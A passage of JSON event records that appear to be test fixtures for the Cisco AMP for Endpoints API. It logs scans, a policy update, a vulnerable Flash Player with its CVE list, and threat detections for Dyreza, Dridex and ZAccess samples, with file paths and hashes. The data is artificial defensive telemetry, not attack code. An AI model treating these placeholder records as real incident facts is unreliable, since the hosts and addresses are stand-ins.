Detections","event_type_id":554696715,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"C:\\Program Files\\Microsoft Games","clean":true,"scanned_files":30,"scanned_processes":0,"scanned_paths":14,"malicious_detections":0}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364789656977000,"timestamp":1610705208,"timestamp_nanoseconds":193000000,"date":"2021-01-15T10:06:48+00:00","event_type":"Scan Started","event_type_id":554696714,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"C:\\Program Files\\Microsoft Games"}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256279812506000,"timestamp":1610705205,"timestamp_nanoseconds":634000000,"date":"2021-01-15T10:06:45+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256279812505635","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156209481303720000,"timestamp":1610705203,"timestamp_nanoseconds":152000000,"date":"2021-01-15T10:06:43+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156209481303719955","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156209477008753000,"timestamp":1610705202,"timestamp_nanoseconds":138000000,"date":"2021-01-15T10:06:42+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156209477008752658","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256228272898000,"timestamp":1610705193,"timestamp_nanoseconds":996000000,"date":"2021-01-15T10:06:33+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256228272898082","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156209416879210000,"timestamp":1610705188,"timestamp_nanoseconds":769000000,"date":"2021-01-15T10:06:28+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156209416879210513","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156209412584243000,"timestamp":1610705187,"timestamp_nanoseconds":755000000,"date":"2021-01-15T10:06:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156209412584243216","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256181028258000,"timestamp":1610705182,"timestamp_nanoseconds":0,"date":"2021-01-15T10:06:22+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256181028257825","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256125193683000,"timestamp":1610705169,"timestamp_nanoseconds":972000000,"date":"2021-01-15T10:06:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256125193682976","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256073654075000,"timestamp":1610705157,"timestamp_nanoseconds":960000000,"date":"2021-01-15T10:05:57+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256073654075423","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533665784395203000,"timestamp":1610705155,"timestamp_nanoseconds":851000000,"date":"2021-01-15T10:05:55+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955899829000000,"timestamp":1610705149,"timestamp_nanoseconds":829000000,"date":"2021-01-15T10:05:49+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1610705149,"start_date":"2021-01-15T10:05:49+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"FlashPlayerApp.exe","identity":{"sha256":"c1219f0799e60ff48a9705b63c14168684aed911610fec68548ea08f605cc42b"}},"vulnerabilities":[{"name":"Adobe Flash Player","version":"11.5.502.146","cve":"CVE-2013-3333","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3333"},{"cve":"CVE-2014-0502","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0502"},{"cve":"CVE-2014-0498","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0498"},{"cve":"CVE-2014-0497","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0497"},{"cve":"CVE-2014-0492","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0492"},{"cve":"CVE-2014-0491","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0491"},{"cve":"CVE-2013-5332","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5332"},{"cve":"CVE-2013-5324","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5324"},{"cve":"CVE-2013-5329","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5329"},{"cve":"CVE-2013-5330","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5330"},{"cve":"CVE-2013-3361","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3361"},{"cve":"CVE-2013-3362","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3362"},{"cve":"CVE-2013-3363","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3363"},{"cve":"CVE-2013-3344","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3344"},{"cve":"CVE-2013-3345","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3345"},{"cve":"CVE-2013-3347","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3347"},{"cve":"CVE-2013-3343","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3343"},{"cve":"CVE-2013-2728","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2728"},{"cve":"CVE-2013-3324","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3324"},{"cve":"CVE-2013-3325","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3325"},{"cve":"CVE-2013-3326","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3326"},{"cve":"CVE-2013-3327","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3327"},{"cve":"CVE-2013-3328","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3328"},{"cve":"CVE-2013-3329","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3329"},{"cve":"CVE-2013-3330","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3330"},{"cve":"CVE-2013-3331","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3331"},{"cve":"CVE-2013-3332","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3332"},{"cve":"CVE-2013-3334","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3334"},{"cve":"CVE-2013-3335","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3335"},{"cve":"CVE-2013-1378","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1378"},{"cve":"CVE-2013-1379","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1379"},{"cve":"CVE-2013-1380","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1380"},{"cve":"CVE-2013-2555","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2555"},{"cve":"CVE-2013-0646","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0646"},{"cve":"CVE-2013-0650","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0650"},{"cve":"CVE-2013-1371","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1371"},{"cve":"CVE-2013-1375","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1375"},{"cve":"CVE-2013-0504","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0504"},{"cve":"CVE-2013-0638","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0638"},{"cve":"CVE-2013-0639","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0639"},{"cve":"CVE-2013-0642","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0642"},{"cve":"CVE-2013-0644","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0644"},{"cve":"CVE-2013-0645","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0645"},{"cve":"CVE-2013-0647","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0647"},{"cve":"CVE-2013-0649","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0649"},{"cve":"CVE-2013-1365","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1365"},{"cve":"CVE-2013-1366","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1366"},{"cve":"CVE-2013-1367","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1367"},{"cve":"CVE-2013-1368","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1368"},{"cve":"CVE-2013-1369","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1369"},{"cve":"CVE-2013-1370","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1370"},{"cve":"CVE-2013-1372","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1372"},{"cve":"CVE-2013-1373","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1373"},{"cve":"CVE-2013-1374","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1374"},{"cve":"CVE-2014-0507","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0507"},{"cve":"CVE-2013-5331","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5331"},{"cve":"CVE-2013-0648","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0648"},{"cve":"CVE-2013-0643","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0643"},{"cve":"CVE-2013-0634","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0634"},{"cve":"CVE-2013-0633","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0633"},{"cve":"CVE-2014-0499","score":7.8,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0499"},{"cve":"CVE-2014-0503","score":6.4,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0503"}]}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364536253907000,"timestamp":1610705149,"timestamp_nanoseconds":228000000,"date":"2021-01-15T10:05:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Backdoor2:ZAccess-tpd","detection_id":"5832364536253906973","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"80000000.@","file_path":"\\\\?\\C:\\$Recycle.Bin\\S-1-5-18\\$ff20833dbb78e410a1126d2ca0eecb73\\U\\80000000.@","identity":{"sha256":"9a9de323dc2ba4059c3eb10d20e8b93a4cc44c93ac41a5dfc9572fa1c0d5b1a8","sha1":"f18d87d7c547ed6118b74b2208e592f67b7fca43","md5":"800381acbba0e7bff6cfd0cfd704bf09"},"parent":{"process_id":496,"disposition":"Clean","file_name":"services.exe","identity":{"sha256":"d7bc4ed605b32274b45328fd9914fb0e7b90d869a38f0e6f94fb1bf4e9e2b407","sha1":"54a90c371155985420f455361a5b3ac897e6c96e","md5":"5f1b6a9c35d3d5ca72d6d6fdef9747d6"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255953394991000,"timestamp":1610705129,"timestamp_nanoseconds":942000000,"date":"2021-01-15T10:05:29+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176255953394991134","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364428879725000,"timestamp":1610705124,"timestamp_nanoseconds":271000000,"date":"2021-01-15T10:05:24+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Kazy:Troj_Generic-tpd","detection_id":"5832364394519986204","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"n","file_path":"\\\\?\\C:\\$Recycle.Bin\\S-1-5-18\\$ff20833dbb78e410a1126d2ca0eecb73\\n","identity":{"sha256":"c9dbfc24f40bc1aa49bd8eac43eb08c26d4587b926f7bacb94cb44a87cdc5600","sha1":"9f9cc367265c8e04747004f4bb122d6084c9bd79","md5":"69bc8b1dcfde7443d80d4b34b45bd193"},"parent":{"process_id":3924,"disposition":"Clean","file_name":"InstallFlashPlayer.exe","identity":{"sha256":"672ec8dceafd429c1a09cfafbc4951968953e2081e0d97243040db16edb24429","sha1":"5c921b125bac24670d2bf27659e100cdf24e7e7f","md5":"2ff9b590342c62748885d459d082295f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255919035253000,"timestamp":1610705121,"timestamp_nanoseconds":628000000,"date":"2021-01-15T10:05:21+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176255919035252765","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"jwenjktgenwrger234231.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Desktop\\D94038FDE7B0F343931DF8040B\\jwenjktgenwrger234231.exe","identity":{"sha256":"7e54dceecd3d3a23a896e971ae4bb9e71a64a5c1c3b77ac1c64241c55c1b95bb","sha1":"5250d75aaa81095512c5160a8e14f941e2022ece","md5":"789b94e94c2793266fe673c578fd8c1b"},"parent":{"process_id":3652,"disposition":"Malicious","file_name":"webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b